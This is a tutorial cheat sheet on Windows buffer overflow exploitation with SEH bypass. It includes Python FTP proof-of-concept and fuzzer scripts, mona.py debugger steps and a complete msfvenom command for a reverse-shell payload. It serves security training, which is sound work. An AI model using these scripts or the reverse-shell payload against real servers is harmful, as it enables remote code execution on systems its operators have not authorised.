GETTING STARTED
Introduction
This is a quick reference to getting started with Buffer Overflow.
- Buffer Overflow Training (learn from scratch show to create your own exploit exploring Buffer Overflow Windows)
- Linkedin page (Eder Luis - 0xffff)
- PDF Version Soon (https://sec4us.com.br)
Immunity Debugger
Install Immunity
download after fill the form: https://debugger.immunityinc.com/ID_register.py
Configure Mona.py in Immunity Debugger
download https://raw.githubusercontent.com/corelan/mona/master/mona.py
put mona.py inside the /pycommands immunity directory
Setting a **logs directory inside Immunitydebugger**
!mona config -set workingfolder c:\logs\%p
- it is importart that the logs directory have been created in the windows machine with immunity.
REGISTERS
What is Registers ?
Register is a small space used by CPU to store information.
Registers - 32 bits
| 32 bits | 16 bits | 8 bits | |
|---|---|---|---|
| High | Low | ||
| eax | ax | ah | al |
| ecx | ax | ch | cl |
| edx | dx | dh | dl |
| ebx | bx | bh | bl |
| esp | sp | spl | |
| EBP | bp | bpl | |
| esi | si | sil | |
| edi | di | dil |
IP - Instruction Pointer
Points to next instruction to be executed
| Register | Description |
|---|---|
ip |
16 bits |
EIP |
32 bits |
rip |
64 bits |
SP - Stack Pointer
Points to top of stack
| Register | Description |
|---|---|
sp |
16 bits |
ESP |
32 bits |
rsp |
64 bits |
PROOF OF CONCEPT (POC)
Example Connection FTP POC [poc-test.py]
#!/usr/bin/python
import sys
import socket
import time
from struct import *
rhost = 'x.x.x.x'
port = 21
buffer = "A" * 100
buffer +='\r\n'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost, port))
print s.recv(2048)
s.send('USER 0xffff\r\n')
print s.recv(2048)
s.send('PASS eder@sec4us\r\n')
print s.recv(2048)
s.send('STOR ' + buffer)
print s.recv(2048)
s.close()
print "Sent Buffer of %s bytes" %len(buffer)
except socket.error as error:
s.close()
print error
Simple Connection FTP POC Fuzzer [fuzzer.py]
#!/usr/bin/python
import socket, time
remoteip="x.x.x.x"
port=21
size=100
buffer = "A" * size
while True:
print "Fuzzing with %s bytes" % len(buffer)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((remoteip, port))
except:
print ("[-] Connection error!")
sys.exit(1)
print s.recv(1024)
print "Sending username..."
s.send('USER anonymous\r\n')
print s.recv(1024)
print "Sending pass..."
s.send('PASS 0xffff@sec4us.com.br\r\n')
print s.recv(1024)
s.send('STOR ' + buffer +'\r\n')
print s.recv(2048)
s.close()
time.sleep(1)
size += 100
buffer = "A" * size
print "-------------------------"
BADCHARS
ASCII Table
| CHAR | DEC | OCT | HEX | Linux |
|---|---|---|---|---|
| (nl) | 10 | 0012 | x0a | \n |
| (cr) | 13 | 0015 | x0d | \r |
| A | 65 | 0101 | x41 | |
| B | 66 | 0102 | x42 | |
| C | 67 | 0103 | x43 |
Commom Badchars
After see the ascii tables, we have 3 common badchars that are bad for the applications
\x00 = Null Byte o end of string
\x0a = New Line \n (linux)
\x0d = Carriage Return \r (linux)
STRUCT EXCEPTION HANDLING (SEH)
1 - What are Exception Handles
An exception handler is a piece of code that is written inside an application, with the purpose of dealing with the fact that the application throws an exception to protect itself.
try
{
//run stuff. If an exception occurs, go to code
}
catch
{
// run stuff when exception occurs
}
2 - SEH Structure
This structure ( also called a SEH record) is 8 bytes and has 2 (4 byte) elements
Image Source: corelan.be
BUFFER OVERFLOW BYPASS SEH - STEP BY STEP
1 - Run Fuzzer
Run the fuzzer to discover how many bytes you get a buffer overflow
./fuzzer.py
2 - Run POC
Run the POC to be sure you got a buffer overflow in the stack, but because of the exception we have to
./poc-test.py
3 - Create a Pattern
creating a pattern with the bytes discovered by fuzzer
msf-pattern_create -l xxx
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
4 - Discover SEH Position in the Stack
inserting the pattern inside the POC and get the address of the SEH (** SEHaddress**) inside of the Immunity Debugger
shift+F9
!mona findmsp
Example:
- Exact match at SEH offset 1037
Example:
offset = "A" * yyy
offset = "A" * 1037
5 - Make a Stack Fitting
it is time of building the exploit. We use in this example a space of the payload with 400 bytes in the ESP and it was necessary fit with bypass of the SEH
Example:
offset = "A" * yyy
# jmp short 8 bytes
seh = "BBBB"
# pop pop ret address
nextseh = "CCCC"
# shellcode space
esp = "D" * 400
buffer = offset + seh + nextseh + esp
6 - Unstacking 8 bytes with (POP POP RET)
!mona seh -n
- choose a address of the best DLL with less security Example: kmdtpcm.dll address 0x1220401E
7 - JUMP SEH STRUCTURE (8bytes)
it is necessary unstacking 8 bytes because SEH has 8 bytes
msf-nasm_shell
nasm> jmp short 08
result: \xeb\x06
8 - New Stack Fitting
# offset before SEH
offset = "A" * yyy
# jmp short 8 bytes
seh = "\x90\x90\xeb\x06"
# pop pop ret to return to SEH
nextseh = pack('<L',0x1220401E)
esp = "D" * 400
buffer = offset + seh + nextseh + esp
9 - Looking For BADCHARS
inside immunity debugger
!mona bytearray
!mona bytearray -cpb "\x00\x0a\x0d"
put the bytearray in your POC
bytearray = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22"
"\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42"
"\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62"
"\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82"
"\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2"
"\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2"
"\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2"
"\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
put your bytearray in the POC e run to get in the immunity the address of the start of the bytearray in the stack (ZZZZZZZZ)
Inside Immunity Debugger
!mona compare -f c:\logs\appname\bytearray.bin -a ZZZZZZZZ
10 - Build a Payload (reverseshell)
using the msfvenom to build a payload of the reverse shell
msfvenom -p windows/shell_reverse_tcp lhost=x.x.x.x lport=xxx -b "\x00\x0a\x0d\x......." -a x86 --platform win -v esp -f python